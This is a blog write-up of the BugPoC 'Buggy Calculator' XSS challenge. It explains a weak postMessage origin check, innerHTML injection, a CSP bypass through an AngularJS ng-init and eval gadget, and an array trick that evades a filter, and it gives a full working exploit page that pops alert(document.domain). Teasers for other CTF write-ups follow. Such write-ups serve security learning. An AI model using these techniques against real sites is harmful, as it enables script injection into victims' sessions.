BugPoc's XSS challenge, Buggy Calculator writeup


This is a write-up for an XSS Challenge by `BugPoC`, Buggy Calculator (calc.buggywebsite.com) that popped out on Twitter recently (link)

This is a website of calculator app designed by angular js.
Eval js by using gadget inside the script (which is the functionality of the caculator) is the best part in this challenge.

Buggy Calculator

A Website running at http://calc.buggywebsite.com/. It's a complete client side application. Our goal is to popup alert(domain).
Functionality is simple like a calculator, on button clicks it is constructing the equation(string), and finally eval that equation on calculate.

Observation - 1

By reading the source code
The app is using iframe(frame.html) to display the result by using `postMessage` communication.
<iframe name="theiframe" style="height:65px;width:100%; left:-100px; margin-top:-05px;margin-bottom:-30px;" frameBorder="0" src="frame.html"></iframe>
HTML
function sendEquation(msg){
	theiframe.postMessage(msg);
}
JavaScript
Whereas in frame.html it is directly injecting that postMessage data into the HTML (document.body.innerHTML=msg) with a origin check. 
window.addEventListener("message", receiveMessage, false);

function receiveMessage(event) {

	// verify sender is trusted
	if (!/^http:\/\/calc.buggywebsite.com/.test(event.origin)) {
		return
	}
	
	// display message 
	msg = event.data;
	if (msg == 'off') {
		document.body.style.color = '#95A799';
	} else if (msg == 'on') {
		document.body.style.color = 'black';
	} else if (!msg.includes("'") && !msg.includes("&")) {
		document.body.innerHTML=msg;
	}
}
JavaScript
we can achieve HTML injection if we can bypass the origin check. 
if (!/^http:\/\/calc.buggywebsite.com/.test(event.origin)) {
JavaScript
Instead of equality it is checking the origin is started with `http://calc.buggywebsite.com`, So we can continue it as `http://calc.buggywebsite.com.evil.com` and get control over it.

Now we achieved HTML injection on calc.buggywebsite.com 
<!DOCTYPE html>
<html>
<body>
    <iframe src="http://calc.buggywebsite.com/frame.html" name="iframe1" onload="runExpliot()"></iframe>

    <script type="text/javascript">
        function runExpliot(){
            let win = window.frames.iframe1;
            payload = "<h1>HTML InjectionM/h1>";
            win.postMessage(payload, "*");
        }
    </script>
</body>
</html>
HTML


Observation - 2

But here comes the main issue.
We can inject a script tag, but we can't execute it as the HTML is injected through `innerHTML`
There is way 
<img src=x onerror=alert(1)> or 
<iframe srcdoc='<script>alert(1)</script>'>
HTML
But inline execution is blocked through the CSP :(
CSP : script-src 'unsafe-eval' 'self'
we can only include self scripts, use eval in script.

Then gone through the srcipt.js to find any gadgets in it and found one. 
<button ng-click="calculate()" ng-disabled="isOff">=</button>
HTML
$scope.calculate = function() {
    $scope.equation = eval($scope.equation).toString();
    sendEquation($scope.equation);
}
JavaScript
Evaluating the equation directly with out any sanitising.
Then gone through, how the equation in build up. 
<button ng-repeat="i in [7,8,9]" ng-click="updateCurrNum(i)" ng-disabled="isOff">{{ i }}</button>
HTML
$scope.updateCurrNum = function(num) {
    if($scope.isInit){
        $scope.equation = num.toString();
        $scope.isInit = false;
    } else 
        $scope.equation += num;
    sendEquation($scope.equation);
}
JavaScript
num value might be anything , it might be alert(1) there is no check implemented to make sure it is a digit or not.

Through the HTML injection we can use that to achieve XSS like 
<button ng-click="updateCurrNum('alert(document.domain);1')">OFF</button>
<button ng-click="calculate()">OFF</button>
HTML
But it need the user interaction click, so searched for the directive components in ng in the angular js docs and found ng-init through which we can call the angular js functions automatically(on initiation).

Final HTML payload to get alert(domain) 
<div ng-app="Calculator" ng-cloak>
    <div ng-controller="ArthmeticController" class="container">
        <button ng-init="updateCurrNum('alert(document.domain);1')">OFF</button>
        <button ng-init="calculate()">OFF</button>
    </div>
    <script src="angular.min.js"></script>
    <script src="jquery.min.js"></script>
    <script src="script.js"></script>
    <iframe name=theiframe></iframe>
</div>
HTML
We need those scripts for the gadget, and CSP allows self scripts so no problem.
As the script try to access the iframe object (theiframe), it's rises as error, to avoid it <iframe name=theiframe></iframe>.

We have to inject that HTML into calc.buggywebsite.com/frame.html through postMessage.
But the payload contains script tags, script does loads through innerHTML injection, but we can use iframe srcdoc. 
<iframe srcdoc="&#x3C;div ng-app=&#x22;Calculator&#x22; ng-cloak&#x3E;&#x3C;div ng-controller=&#x22;ArthmeticController&#x22; class=&#x22;container&#x22;&#x3E;&#x3C;button ng-init=&#x22;updateCurrNum(&#x27;alert(document.domain);1&#x27;)&#x22;&#x3E;OFF&#x3C;/button&#x3E;&#x3C;button ng-init=&#x22;calculate()&#x22;&#x3E;OFF&#x3C;/button&#x3E;&#x3C;/div&#x3E;&#x3C;script src=&#x22;angular.min.js&#x22;&#x3E;&#x3C;/script&#x3E;&#x3C;script src=&#x22;jquery.min.js&#x22;&#x3E;&#x3C;/script&#x3E;&#x3C;script src=&#x22;script.js&#x22;&#x3E;&#x3C;/script&#x3E;&#x3C;iframe name=theiframe&#x3E;&#x3C;/iframe&#x3E;&#x3C;/div&#x3E;"></iframe>
HTML
Injecting that payload doesn't worked. but why :(


Observation - 3

There is check in frame.js before injecting the HTML
At first it doesn't make any sense,so leaved. But now it blocking the payload. 
} else if (!msg.includes("'") && !msg.includes("&")) {
    document.body.innerHTML=msg;
}
JavaScript
First tried my best to avoid & and ' in the payload, but no use.
After that tried to bypass the check. as it is a string it is checking char by char, what if it a list.
we know that, through postMessage we can send list, object, string.
`["asdf"].toString() => "asdf"` so it doesn't make any difference, through which the check was bypassed


Finally

The payload is (this page must be on calc.buggywebsite.com.<domain.com> for origin check bypass) 
<!DOCTYPE html>
<html>
<body>
    <iframe src="http://calc.buggywebsite.com/frame.html" name="iframe1" onload="runExpliot()"></iframe>

    <script type="text/javascript">
        function runExpliot(){
            let win = window.frames.iframe1;
            payload = ['<iframe srcdoc="&#x3C;div ng-app=&#x22;Calculator&#x22; ng-cloak&#x3E;&#x3C;div ng-controller=&#x22;ArthmeticController&#x22; class=&#x22;container&#x22;&#x3E;&#x3C;button ng-init=&#x22;updateCurrNum(&#x27;alert(document.domain);1&#x27;)&#x22;&#x3E;OFF&#x3C;/button&#x3E;&#x3C;button ng-init=&#x22;calculate()&#x22;&#x3E;OFF&#x3C;/button&#x3E;&#x3C;/div&#x3E;&#x3C;script src=&#x22;angular.min.js&#x22;&#x3E;&#x3C;/script&#x3E;&#x3C;script src=&#x22;jquery.min.js&#x22;&#x3E;&#x3C;/script&#x3E;&#x3C;script src=&#x22;script.js&#x22;&#x3E;&#x3C;/script&#x3E;&#x3C;iframe name=theiframe&#x3E;&#x3C;/iframe&#x3E;&#x3C;/div&#x3E;"></iframe>'];
            win.postMessage(payload, "*");
        }
    </script>
</body>
</html>
HTML


Comments

Post a Comment

Popular posts from this blog

Square CTF 2019 Writeup's

Image
   [*]-challenges    [+] (one   - 100 pts) Talk to me    [+] (two   - 700 pts) Aesni    [+] (three - 150 pts) Decode me    [+] (five  - 200 pts) Inwasmble    [+] (seven - 600 pts) Lockbox    [+] (nine  - 700 pts) Sudo make me a flag Our Team Invaders ended up at 19th position With points 3450 points Talk to me A service running at `talk-to-me-dd00922915bfc3f1.squarectf.com:5678` $ nc talk-to-me-dd00922915bfc3f1.squarectf.com 5678 Hello! aaaaaaaaaaaa Sorry, I can't understand you. Saying Hello! and asking for input(aaaaaaaaaaaa) Then returning a message After some trails, Two errors meant a lot (for 1 and ') $ nc talk-to-me-dd00922915bfc3f1.squarectf.com 5678 Hello! 1 undefined method `match' for 1:Integer /talk_to_me.rb:16:in `receive_data' /var/lib/gems/2.5.0/gems/eventmachine-1.2.7/lib/eventmachine.rb:195:in `run_machine' /v...
Read more

K3RN3L CTF 2021 Rev - `Recurso & Rasm ` writeups

Image
This is a write-up for Reverse engineering challenges in K3RN3LCTF 2021 based on VM Concept using Recurso Language [*]-challenges     [+] (Rev - 500 pts) Recurso ( First Blood )     [+] (Rev - 500 pts) Rasm (After CTF) Our Team zh3ro ended up at 9 th position in `K3RN3LCTF - 2021`. These Reverse engineering challs are interesting -> Both are based on one vm only (Recurso), different compiled scripts . (leFlag.recc , rasm.recc) Recurso Given a Recurso Execuatable which can compile, run recurso sccrips. And a leFlag.recc (a recurso compiled file) containing a flag checking logic, can be run by given Recurso executable. The Goal of the challenge is to get the flag checking logic in leFlag.recc and steal flag Decompile and Analyse -> Recurso First we have to get to know about how the Recurso is running this byte cod...
Read more

Confidence CTF 2020 `Cat web` challenge writeup

Image
[*]-challenges     [+] (157 pts) Cat web Our Team Invaders ended up at 59th position in `CONFidence 2020 CTF` conducted by `p4 team`. The `Cat web challenge` was pretty interesting without any guess and chaining all together to achieve flag etc, which made me to write this Writeup. Cat Web A service running at `http://catweb.zajebistyc.tf/` <html> <head> <title>My cats</title> <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script> <script> function getNewCats(kind) { $.getJSON('http://catweb.zajebistyc.tf/cats?kind='+kind, function(data) { if(data.status != 'ok') { return; } $('#cats_container').empty(); cats = data.content; cats.forEach(function(cat) { var newDiv = document.createElement('div'); newDiv.innerHTML = '<img style="max-width: 200px; max-height: 200px" src=...
Read more